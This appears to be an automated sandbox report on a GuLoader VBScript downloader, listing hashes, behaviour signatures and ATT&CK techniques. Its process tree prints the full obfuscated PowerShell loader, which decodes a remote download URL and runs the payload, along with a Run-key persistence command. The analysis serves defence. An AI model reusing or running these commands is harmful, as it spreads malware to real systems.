guloader | 1d6d36ec589cbecea839e3b4a5156a35f48436847043f2e1f307f6579e7893e2

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
08/06/2024, 07:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1d6d36ec589cbecea839e3b4a5156a35f48436847043f2e1f307f6579e7893e2.vbs
Size

154KB
MD5

8993abe6fdbed5a58e5f8806cb1a12d8
SHA1

6f52e232be6a55b0411d2d2bf1e03b01b7388921
SHA256

1d6d36ec589cbecea839e3b4a5156a35f48436847043f2e1f307f6579e7893e2
SHA512

9de0b6554063778d0fec454f0fcb72acc5a1b652aff0f4513254097b6cfdce80c496e330ba93c2bacbabc5437fa508a124eb5e099c0e92dca2d7b70975090bd3
SSDEEP

3072:Gvn9Dm5IXdH7eAlsSyP/ioJbae+nzu6J5RcuXrMLyVZH4lY0Gx2gDwDjNMrt:Gvn9Dm5IXdH7ecsSyP/io9ae+nzu6J5j

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	1712	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kuldsejledes = "%Fermenteringerne% -w 1 $Objurgations=(Get-ItemProperty -Path 'HKCU:\\Come\\').Chilliwack;%Fermenteringerne% ($Objurgations)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2424	wab.exe
2424	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2628	powershell.exe
2424	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2628 set thread context of 2424	2628	powershell.exe	34

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2468	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1712	powershell.exe
2628	powershell.exe
2628	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2628	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 1712	1732	WScript.exe	28
PID 1732 wrote to memory of 1712	1732	WScript.exe	28
PID 1732 wrote to memory of 1712	1732	WScript.exe	28
PID 1712 wrote to memory of 2716	1712	powershell.exe	30
PID 1712 wrote to memory of 2716	1712	powershell.exe	30
PID 1712 wrote to memory of 2716	1712	powershell.exe	30
PID 1712 wrote to memory of 2628	1712	powershell.exe	32
PID 1712 wrote to memory of 2628	1712	powershell.exe	32
PID 1712 wrote to memory of 2628	1712	powershell.exe	32
PID 1712 wrote to memory of 2628	1712	powershell.exe	32
PID 2628 wrote to memory of 2488	2628	powershell.exe	33
PID 2628 wrote to memory of 2488	2628	powershell.exe	33
PID 2628 wrote to memory of 2488	2628	powershell.exe	33
PID 2628 wrote to memory of 2488	2628	powershell.exe	33
PID 2628 wrote to memory of 2424	2628	powershell.exe	34
PID 2628 wrote to memory of 2424	2628	powershell.exe	34
PID 2628 wrote to memory of 2424	2628	powershell.exe	34
PID 2628 wrote to memory of 2424	2628	powershell.exe	34
PID 2628 wrote to memory of 2424	2628	powershell.exe	34
PID 2628 wrote to memory of 2424	2628	powershell.exe	34
PID 2424 wrote to memory of 316	2424	wab.exe	35
PID 2424 wrote to memory of 316	2424	wab.exe	35
PID 2424 wrote to memory of 316	2424	wab.exe	35
PID 2424 wrote to memory of 316	2424	wab.exe	35
PID 316 wrote to memory of 2468	316	cmd.exe	37
PID 316 wrote to memory of 2468	316	cmd.exe	37
PID 316 wrote to memory of 2468	316	cmd.exe	37
PID 316 wrote to memory of 2468	316	cmd.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1d6d36ec589cbecea839e3b4a5156a35f48436847043f2e1f307f6579e7893e2.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spectroscopists120 = 1;Function Statsraads($Cablegram){$Broderfolket=$Cablegram.Length-$Spectroscopists120;$Boombox='Substring';For( $Udryddendes=5;$Udryddendes -lt $Broderfolket;$Udryddendes+=6){$Semimembranosus+=$Cablegram.$Boombox.Invoke( $Udryddendes, $Spectroscopists120);}$Semimembranosus;}function Saddirham($Assika){ & ($rapaciously) ($Assika);}$Stteriets=Statsraads 'L tulMPragmo etydzSlrini RoqulForgrl Sym aFlytn/Virge5Reins. Ca s0Skovl S ol(F.sfoW ommiF enunEtagedzymuroBigutwPathosInd,r GoumiN,dateT unp. Feltp1Troll0Nd.ed. Syko0Drunk;Baner RhataWBrea,iJaspenDorlo6Unref4 S at;,adka I,dkrxAuc,t6Guldf4Re,it;,adde Over.r ,andvc.sse:Ro le1Unsym2Hydri1Fear,.Snooz0Abstr)Straf PardsGPro,uefo urcBle,sk.ffixo Rei./Klfte2,lyng0 Un,o1tunin0ramle0 Ch.k1Ddsdm0 Meda1Ex er plejeFMortiiFokker,hetreMyc,sfShephoAmadexKmela/ Outh1F lsk2Nippo1Forp...rodu0 ortu ';$preverbal=Statsraads ' SquiUanfrasprogre Endsr Div,-Femd.AOss,tgVaredehecton T.ymtBrand ';$Gardehusarer=Statsraads ' P.eshUnroutlintst Surbp B.dr:Rosc,/,itha/ N tn1Uddel9 Elek4ar ej.Fanta5Acide9Elabo.vands3 Syst1.azin. Data1syn.t8P leg7conve/EnaktTPulayi ParalRadiosGr tikAfskurIntere ForpnHaverdTangfeGtcwisBeads.BifigtDevitoProboc,lfen ';$Auras=Statsraads ',igna>Prost ';$rapaciously=Statsraads 'Jadesi OrgeeLeninxCyke. ';$Beskylles='Patrichs';$stereography = Statsraads 'ponceeKerencJus.ih ,revo Wi.i Hjrej%Uh.giaFetispPhosppBnfstd UdspaTribut Downa Clea%Radi.\VengiBgscocaLavtrs P.aksHyr,riMellisTilhut,upere tidsn .ihesSocia.W.ylaT PresiEdeltlUdskn Knife&Konta&Quaif Fee,eVgtencSnigmhMudguo.rygt Limfat Olaj ';Saddirham (Statsraads ' Ur.n$Sk legPriorlIn lao.oladb,appoaMe,vilExcre:Afgr SAksl.lCreataStrewdKon,rrFlesteBackrt WaleaAccins,melikImpeeePala n.kattsNonfe=Hatte(Pueric MellmSprydd Thor Flueg/ r.edcNilda K.ttl$DuettsBeetlt Ou.tecan orCurb eTotaloGuglig direr MolaaSpeedpJalouh C.mpyNe,sp)Ka.it ');Saddirham (Statsraads ' Slag$Rn.gegRemedlBetryoDioctb LollaForevlverni:Pe,iogunlimeFondlvOddneiNo,dirAnd.rsFangl=Lobhu$ IslnGAnt,saZircor TubadMyndietilfrh,ractuD,nsesNonnuaCopyhr Hippe Wea rMaale.ProtosTaknipBondelBed.iiUddantSubso(Birr.$ Dem,AMultiuUrisir AfhjainkvisInlan)Undes ');$Gardehusarer=$gevirs[0];$kontorautomatiseringer= (Statsraads 'Genne$.usmdgDag jlDredgoBumblb SubkaHyperlporen:unpurFBrorso sjlerab.trt fstrhSuperySutte=CaracNPlasmeCircuw N.np-HistoOSemafbChannjBejume tandcMangetT,esa EfeueS.lrumyNemessSeriot WaveeTurbomEnk.l. jumiNI.done Kurdt Digt.LumskW tauteBorgeb FyldCGuerdlSen,ei BeabeAfgifn,osnit');$kontorautomatiseringer+=$Sladretaskens[1];Saddirham ($kontorautomatiseringer);Saddirham (Statsraads 'Udspi$ BrndFOutdaoGammer.ntertSquethVindbyBeadw. affiH,edsaeRustiaUnderdMorgeeWaterr TotasSvejf[Indes$MicropM.trerBigg ePointvPrstee OverrBechabDesi,aInterl Hyld] dest=Bicor$ rsenSTennitg.amotSdelieSprigr.olypiF.ambeP.eretDzublsReali ');$Musikledsagelses=Statsraads ' .oit$ UdlsFSe veoropemr RedatSyrerhElendyovers.PapooDElit.oH.lvewFrgemnKarkllcountoTrik.a Mercd.askoFkirkeiFractl Forhe,ndep(U,set$ AreoG,anawaSharprUnderdAutogebletthMilesu ddyksKrakkaRituarKludge,atrir Capi,Rygea$AgronSDumrikUpwaraCy,herServev.krtoerecivrOverv)Dimin ';$Skarver=$Sladretaskens[0];Saddirham (Statsraads 'F,ste$C hobgNota.lNedtaoSkolebUltaoaBlekilNeda,:LibelFJ,leliT.mbefStaalfLogeriDobbegIretttHyper=Grimf(FitzcTHjmeseLyskusVirgitDuode-,rigiPDuskea .ilttSbladhGedeh Brled$BirreS ustiktartaaExtrarPapbavKnivseDisesrN.tri)Angel ');while (!$Fiffigt) {Saddirham (Statsraads 'Proto$Im ergTilsalSkuffoFalcob Stada BroflSi el:ArvetDSe.enrDownca liqpAkt.oaPo,tcrAvissn orguaAvenallssald Sa miMi jsa Fors=condu$M nimtEks rr ConsuragnseInit ') ;Saddirham $Musikledsagelses;Saddirham (Statsraads 'ForesSDe ivtMaenaaGejlerPer,lt Offi- NudaSMinislUnwifeStrane S.lrpsuper G.ade4Sko,n ');Saddirham (Statsraads 'Stoma$InfangVolu lTurbooSubstbNoninaAmun.lS,iri:MesmeFVer.ciT,ynef M,kifOverhisk.ivgOpsprtPicks=Rec.i(Bad.aTGullieLivvis Simut.urse-QuincP ,omsadepr,tSaarhhAlkoh Kon $An,acSHumorkSkrddaTidsbrBlistvKantaePlakerSulp.)Herme ') ;Saddirham (Statsraads 'Nedgr$ NeurgUnsailMag.ao NathbBlu.da Sl slpostg:ModesU NearpUnselcSten o Folkl Cri,uReskrmQuiltnClima= ,nde$ CompgbatlilSkruboC.vatb offia Gnuelp.ilo:Mer eFGrubslHeredaFi urtFertitBlddee heptr MesteAbiolrRounds.andp+Eloig+Solri%Reine$Sl,ergB,ryteEmbo vRaa.aiMisjur F ovsAfdel.T mblc LyrioFleksuArbejnSttemtHalvp ') ;$Gardehusarer=$gevirs[$Upcolumn];}$Skvatte=334511;$mellemleddets=27712;Saddirham (Statsraads 'Erteb$ddsaag UnvelAfsteoSagumbAnalca.ttral,ydro:Ya miFDat doIsenkrNougafT,phelBearbg TrapeCharnlOpbygsDugaleUdenrrOmni.sWobbl Likvi=Aktio MarkdGVedl eatombtBelur-EmetaCCicisoOrnitn.ordst GheteStmagnDebo.tFrden E,rus$,appoS,evrtkUdt,kaMagnerValvev InsceG.rlirMarin ');Saddirham (Statsraads ' sk.b$ Ca mgLednilHolosoVas bbRetaraChi.al Cha,: TappM,eaveiOdyssn InfaiE,logaOrgantScr,euaugusrMag.eiPole.s sk.fa PanetBoendiN.foroSi.din Vrdi Alien=H,gge Kends[BredbSYngvaySheddsChiv,t Rimse Uds.m port.ForsiCT,ckloMethon ArchvAfhngeun,ovrBrochtC.ust]Fouri:Heter:AmphiFRadiarRingioTox,pmTveknB AfsnaHandisE,dekeHypon6Denta4PrsteS,onottUnprerR,gidiSheltnhypatg Dion( Myom$IndhoFSavn.oBekkar BeatfToughlco,esg LifteSaml l,rizzs Per,e KlosrPythos Brug)Annih ');Saddirham (Statsraads 'Strkl$Tol fg.avanlSampio RepobSponsaSeptal Diac:BibliOOptrkp FilmlAut,ha,oldenPterydCom.lsOutguaHeavevgrundiM raksWastee pensrNewsmnNit.oe Hemo Mosq=Skift .ushg[SubriSFokusySpol.sRets tKa,aneGallum oeti. MarkTAdapteSyn,hxNondetBushb.ErkynE SkvanledincSlvmeo Ndded RektiSlvp,n StregMonof]Pocke:.ounc:TintiA ,ensSRdbedCT rfaIPluskIPedic. DaemGMarreeCiboltUlykkSHeathtAutorrSatiriFurlanC untg Brun(Disun$PrivaM Linei P,linDu,deiSlgtsaUn.aitDaydruUndolrUdhveiMa ros S.ela ToiltAfsvkiTumuloOmbu.nprsid),ntoo ');Saddirham (Statsraads 'Timed$U,idigOffwal AarmoGroucbBaaseaYn.eslOpini:bombaDGodseeRulammE,evaiFluxemGadekeUdtrktDialyoHamatpAposteunchi=Kraki$ParafOVodbipApelilA roya Nu unPattedBro,zsSubsta.opolvSalemi Te,rsPebreeMlkerr concnUdv,seGrund.GarrysSlagsuNaimab St.vsPresst NonarTenseiEmporn belagAlter(A ast$UnemaSKu.stkH,kkev S,roa ProgtOppeit Misbestorl,lofte$fab fmLydbie Rem lSer,tlK.amteO ergmDi,sclNonore SnusdD mphd LegeeFug,itTrldosHeddi)Gr ek ');Saddirham $Demimetope;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1712
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bassistens.Til && echo t"
    3⤵
    PID:2716
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Spectroscopists120 = 1;Function Statsraads($Cablegram){$Broderfolket=$Cablegram.Length-$Spectroscopists120;$Boombox='Substring';For( $Udryddendes=5;$Udryddendes -lt $Broderfolket;$Udryddendes+=6){$Semimembranosus+=$Cablegram.$Boombox.Invoke( $Udryddendes, $Spectroscopists120);}$Semimembranosus;}function Saddirham($Assika){ & ($rapaciously) ($Assika);}$Stteriets=Statsraads 'L tulMPragmo etydzSlrini RoqulForgrl Sym aFlytn/Virge5Reins. Ca s0Skovl S ol(F.sfoW ommiF enunEtagedzymuroBigutwPathosInd,r GoumiN,dateT unp. Feltp1Troll0Nd.ed. Syko0Drunk;Baner RhataWBrea,iJaspenDorlo6Unref4 S at;,adka I,dkrxAuc,t6Guldf4Re,it;,adde Over.r ,andvc.sse:Ro le1Unsym2Hydri1Fear,.Snooz0Abstr)Straf PardsGPro,uefo urcBle,sk.ffixo Rei./Klfte2,lyng0 Un,o1tunin0ramle0 Ch.k1Ddsdm0 Meda1Ex er plejeFMortiiFokker,hetreMyc,sfShephoAmadexKmela/ Outh1F lsk2Nippo1Forp...rodu0 ortu ';$preverbal=Statsraads ' SquiUanfrasprogre Endsr Div,-Femd.AOss,tgVaredehecton T.ymtBrand ';$Gardehusarer=Statsraads ' P.eshUnroutlintst Surbp B.dr:Rosc,/,itha/ N tn1Uddel9 Elek4ar ej.Fanta5Acide9Elabo.vands3 Syst1.azin. Data1syn.t8P leg7conve/EnaktTPulayi ParalRadiosGr tikAfskurIntere ForpnHaverdTangfeGtcwisBeads.BifigtDevitoProboc,lfen ';$Auras=Statsraads ',igna>Prost ';$rapaciously=Statsraads 'Jadesi OrgeeLeninxCyke. ';$Beskylles='Patrichs';$stereography = Statsraads 'ponceeKerencJus.ih ,revo Wi.i Hjrej%Uh.giaFetispPhosppBnfstd UdspaTribut Downa Clea%Radi.\VengiBgscocaLavtrs P.aksHyr,riMellisTilhut,upere tidsn .ihesSocia.W.ylaT PresiEdeltlUdskn Knife&Konta&Quaif Fee,eVgtencSnigmhMudguo.rygt Limfat Olaj ';Saddirham (Statsraads ' Ur.n$Sk legPriorlIn lao.oladb,appoaMe,vilExcre:Afgr SAksl.lCreataStrewdKon,rrFlesteBackrt WaleaAccins,melikImpeeePala n.kattsNonfe=Hatte(Pueric MellmSprydd Thor Flueg/ r.edcNilda K.ttl$DuettsBeetlt Ou.tecan orCurb eTotaloGuglig direr MolaaSpeedpJalouh C.mpyNe,sp)Ka.it ');Saddirham (Statsraads ' Slag$Rn.gegRemedlBetryoDioctb LollaForevlverni:Pe,iogunlimeFondlvOddneiNo,dirAnd.rsFangl=Lobhu$ IslnGAnt,saZircor TubadMyndietilfrh,ractuD,nsesNonnuaCopyhr Hippe Wea rMaale.ProtosTaknipBondelBed.iiUddantSubso(Birr.$ Dem,AMultiuUrisir AfhjainkvisInlan)Undes ');$Gardehusarer=$gevirs[0];$kontorautomatiseringer= (Statsraads 'Genne$.usmdgDag jlDredgoBumblb SubkaHyperlporen:unpurFBrorso sjlerab.trt fstrhSuperySutte=CaracNPlasmeCircuw N.np-HistoOSemafbChannjBejume tandcMangetT,esa EfeueS.lrumyNemessSeriot WaveeTurbomEnk.l. jumiNI.done Kurdt Digt.LumskW tauteBorgeb FyldCGuerdlSen,ei BeabeAfgifn,osnit');$kontorautomatiseringer+=$Sladretaskens[1];Saddirham ($kontorautomatiseringer);Saddirham (Statsraads 'Udspi$ BrndFOutdaoGammer.ntertSquethVindbyBeadw. affiH,edsaeRustiaUnderdMorgeeWaterr TotasSvejf[Indes$MicropM.trerBigg ePointvPrstee OverrBechabDesi,aInterl Hyld] dest=Bicor$ rsenSTennitg.amotSdelieSprigr.olypiF.ambeP.eretDzublsReali ');$Musikledsagelses=Statsraads ' .oit$ UdlsFSe veoropemr RedatSyrerhElendyovers.PapooDElit.oH.lvewFrgemnKarkllcountoTrik.a Mercd.askoFkirkeiFractl Forhe,ndep(U,set$ AreoG,anawaSharprUnderdAutogebletthMilesu ddyksKrakkaRituarKludge,atrir Capi,Rygea$AgronSDumrikUpwaraCy,herServev.krtoerecivrOverv)Dimin ';$Skarver=$Sladretaskens[0];Saddirham (Statsraads 'F,ste$C hobgNota.lNedtaoSkolebUltaoaBlekilNeda,:LibelFJ,leliT.mbefStaalfLogeriDobbegIretttHyper=Grimf(FitzcTHjmeseLyskusVirgitDuode-,rigiPDuskea .ilttSbladhGedeh Brled$BirreS ustiktartaaExtrarPapbavKnivseDisesrN.tri)Angel ');while (!$Fiffigt) {Saddirham (Statsraads 'Proto$Im ergTilsalSkuffoFalcob Stada BroflSi el:ArvetDSe.enrDownca liqpAkt.oaPo,tcrAvissn orguaAvenallssald Sa miMi jsa Fors=condu$M nimtEks rr ConsuragnseInit ') ;Saddirham $Musikledsagelses;Saddirham (Statsraads 'ForesSDe ivtMaenaaGejlerPer,lt Offi- NudaSMinislUnwifeStrane S.lrpsuper G.ade4Sko,n ');Saddirham (Statsraads 'Stoma$InfangVolu lTurbooSubstbNoninaAmun.lS,iri:MesmeFVer.ciT,ynef M,kifOverhisk.ivgOpsprtPicks=Rec.i(Bad.aTGullieLivvis Simut.urse-QuincP ,omsadepr,tSaarhhAlkoh Kon $An,acSHumorkSkrddaTidsbrBlistvKantaePlakerSulp.)Herme ') ;Saddirham (Statsraads 'Nedgr$ NeurgUnsailMag.ao NathbBlu.da Sl slpostg:ModesU NearpUnselcSten o Folkl Cri,uReskrmQuiltnClima= ,nde$ CompgbatlilSkruboC.vatb offia Gnuelp.ilo:Mer eFGrubslHeredaFi urtFertitBlddee heptr MesteAbiolrRounds.andp+Eloig+Solri%Reine$Sl,ergB,ryteEmbo vRaa.aiMisjur F ovsAfdel.T mblc LyrioFleksuArbejnSttemtHalvp ') ;$Gardehusarer=$gevirs[$Upcolumn];}$Skvatte=334511;$mellemleddets=27712;Saddirham (Statsraads 'Erteb$ddsaag UnvelAfsteoSagumbAnalca.ttral,ydro:Ya miFDat doIsenkrNougafT,phelBearbg TrapeCharnlOpbygsDugaleUdenrrOmni.sWobbl Likvi=Aktio MarkdGVedl eatombtBelur-EmetaCCicisoOrnitn.ordst GheteStmagnDebo.tFrden E,rus$,appoS,evrtkUdt,kaMagnerValvev InsceG.rlirMarin ');Saddirham (Statsraads ' sk.b$ Ca mgLednilHolosoVas bbRetaraChi.al Cha,: TappM,eaveiOdyssn InfaiE,logaOrgantScr,euaugusrMag.eiPole.s sk.fa PanetBoendiN.foroSi.din Vrdi Alien=H,gge Kends[BredbSYngvaySheddsChiv,t Rimse Uds.m port.ForsiCT,ckloMethon ArchvAfhngeun,ovrBrochtC.ust]Fouri:Heter:AmphiFRadiarRingioTox,pmTveknB AfsnaHandisE,dekeHypon6Denta4PrsteS,onottUnprerR,gidiSheltnhypatg Dion( Myom$IndhoFSavn.oBekkar BeatfToughlco,esg LifteSaml l,rizzs Per,e KlosrPythos Brug)Annih ');Saddirham (Statsraads 'Strkl$Tol fg.avanlSampio RepobSponsaSeptal Diac:BibliOOptrkp FilmlAut,ha,oldenPterydCom.lsOutguaHeavevgrundiM raksWastee pensrNewsmnNit.oe Hemo Mosq=Skift .ushg[SubriSFokusySpol.sRets tKa,aneGallum oeti. MarkTAdapteSyn,hxNondetBushb.ErkynE SkvanledincSlvmeo Ndded RektiSlvp,n StregMonof]Pocke:.ounc:TintiA ,ensSRdbedCT rfaIPluskIPedic. DaemGMarreeCiboltUlykkSHeathtAutorrSatiriFurlanC untg Brun(Disun$PrivaM Linei P,linDu,deiSlgtsaUn.aitDaydruUndolrUdhveiMa ros S.ela ToiltAfsvkiTumuloOmbu.nprsid),ntoo ');Saddirham (Statsraads 'Timed$U,idigOffwal AarmoGroucbBaaseaYn.eslOpini:bombaDGodseeRulammE,evaiFluxemGadekeUdtrktDialyoHamatpAposteunchi=Kraki$ParafOVodbipApelilA roya Nu unPattedBro,zsSubsta.opolvSalemi Te,rsPebreeMlkerr concnUdv,seGrund.GarrysSlagsuNaimab St.vsPresst NonarTenseiEmporn belagAlter(A ast$UnemaSKu.stkH,kkev S,roa ProgtOppeit Misbestorl,lofte$fab fmLydbie Rem lSer,tlK.amteO ergmDi,sclNonore SnusdD mphd LegeeFug,itTrldosHeddi)Gr ek ');Saddirham $Demimetope;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bassistens.Til && echo t"
      4⤵
      PID:2488
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:2424
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kuldsejledes" /t REG_EXPAND_SZ /d "%Fermenteringerne% -w 1 $Objurgations=(Get-ItemProperty -Path 'HKCU:\Come\').Chilliwack;%Fermenteringerne% ($Objurgations)"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:316
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kuldsejledes" /t REG_EXPAND_SZ /d "%Fermenteringerne% -w 1 $Objurgations=(Get-ItemProperty -Path 'HKCU:\Come\').Chilliwack;%Fermenteringerne% ($Objurgations)"
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Bassistens.Til

Filesize
471KB

MD5
f871d41b68529e905bb07cbb41fc3742

SHA1
218279abe825fcf4f17158e8356edb9f978be794

SHA256
2a3751451d7dbeb778a0f6e9daaba5b4f07e890bcdcdd2ea7ef45158ccd69e8c

SHA512
ad68b3625f62f4cd420e84733daa7b66086217f219625e849944c21516363aa77502b147ebfd49e47f3358480850402601936c7abbb0d404b5f76d94e2dbb4eb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GMABMQ09LNFUN5I0AC1R.temp

Filesize
7KB

MD5
f46fcccee2d797a06abb77815610b87f

SHA1
bd4429126f34a22f815404c56623dc8b563dc5e3

SHA256
b753d6f2828da1ea820fad706b88a31be1a2651fe3e4b2301359044d46474c93

SHA512
7fc2cf2d5b9133deb3610b0243c248ddeb3d70dffd1a7bcc234b340ea29bc98e9ea879f7124a3f7ae22881e253e669c50c25f7bc1d31c2a32c282faced6a1f81

Download Submit
memory/1712-10-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

Filesize
9.6MB

Download
memory/1712-7-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

Filesize
9.6MB

Download
memory/1712-8-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

Filesize
9.6MB

Download
memory/1712-9-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

Filesize
9.6MB

Download
memory/1712-4-0x000007FEF608E000-0x000007FEF608F000-memory.dmp

Filesize
4KB

Download
memory/1712-6-0x0000000001E50000-0x0000000001E58000-memory.dmp

Filesize
32KB

Download
memory/1712-5-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/1712-17-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

Filesize
9.6MB

Download
memory/1712-18-0x000007FEF608E000-0x000007FEF608F000-memory.dmp

Filesize
4KB

Download
memory/1712-22-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

Filesize
9.6MB

Download
memory/2424-19-0x0000000001310000-0x0000000001D34000-memory.dmp

Filesize
10.1MB

Download
memory/2628-16-0x00000000065C0000-0x0000000006FE4000-memory.dmp

Filesize
10.1MB

Download